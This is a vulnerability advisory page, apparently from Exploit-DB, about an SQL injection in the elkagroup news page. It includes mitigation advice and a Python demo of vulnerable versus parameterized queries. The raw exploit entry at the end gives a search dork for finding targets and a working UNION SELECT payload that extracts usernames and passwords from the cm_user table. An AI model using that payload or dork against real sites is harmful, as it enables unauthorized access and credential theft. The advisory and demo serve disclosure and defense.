Vendor: elkagroup
By: SadHaCkEr
CVSS: 9 (HIGH)
SQL Injection
CWE: 89
Product Name: elkagroup
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

elkagroup SQL Injection Vulnerability (Iranian Script)

A SQL injection vulnerability exists in elkagroup, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to insufficient input validation of the 'id' parameter in the 'news' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable server. Successful exploitation of this vulnerability can allow an attacker to gain unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized before being used in SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
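
The two mitigations above, shown side by side as an added example (not code from elkagroup or from the advisory). The `news` table layout, the function names, and the use of Python with SQLite are assumptions made for illustration; only the `id` parameter and the `cm_user` table name come from this page.

```python
import sqlite3

def make_db():
    """Constructed in-memory database; the table layout is assumed, not the product's."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE cm_user (username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Launch', 'Product launched.');
        INSERT INTO cm_user VALUES ('admin', 'constructed-hash');
    """)
    return db

def get_news_vulnerable(db, raw_id):
    # 'Before' form: the request value is concatenated into the SQL text,
    # so anything after the number is parsed as SQL.
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = " + raw_id
    ).fetchall()

def parse_news_id(raw_id):
    # Allow-list validation: ASCII decimal digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def get_news_safe(db, raw_id):
    # Hardened form: validate first, then bind the value as a parameter
    # so it is never parsed as SQL.
    news_id = parse_news_id(raw_id)
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()

# Constructed hostile value with the same shape as the request described above.
HOSTILE_ID = "0 UNION SELECT 1, username, password FROM cm_user"

if __name__ == "__main__":
    db = make_db()
    print(get_news_vulnerable(db, HOSTILE_ID))  # returns the cm_user row
    print(get_news_safe(db, "1"))               # returns the news row
    try:
        get_news_safe(db, HOSTILE_ID)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and parameter binding are independent layers: binding alone already keeps the value out of the SQL grammar, and the integer check rejects malformed requests before they reach the database.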

Exploit-DB raw data:

#Dork : "powered by: elkagroup"

[*]############################################## 
[+] |____SadHaCkEr__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]==========================================================================
[*] About    : elkagroup SQL Injection Vulnerability (Iranian Script)
[!] Site     : http://www.elkagroup.com
[!] Author   : SadHaCkEr
[!] Site     : www.alkrsan.net + www.tryag.cc
[!] E-Mail   : sad@hack3d.org
[!] Location : Saudi Arabia
[!]==========================================================================
[!] MyWebSite    http://www.sadx.297m.com
[!]==========================================================================
[!] Exp:
[!]  http://server/news/?id=[SQL]
[!]
[!]    [SQL] :
[!]	    UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--
[!]
[!] Greetz 2 : alkrsan - Alaooy HaCkEr - S.C.T - RXH - ayaster - Mr.Wolf  and All My Friends
[!]
[!] Sad Team
[!]==========================================================================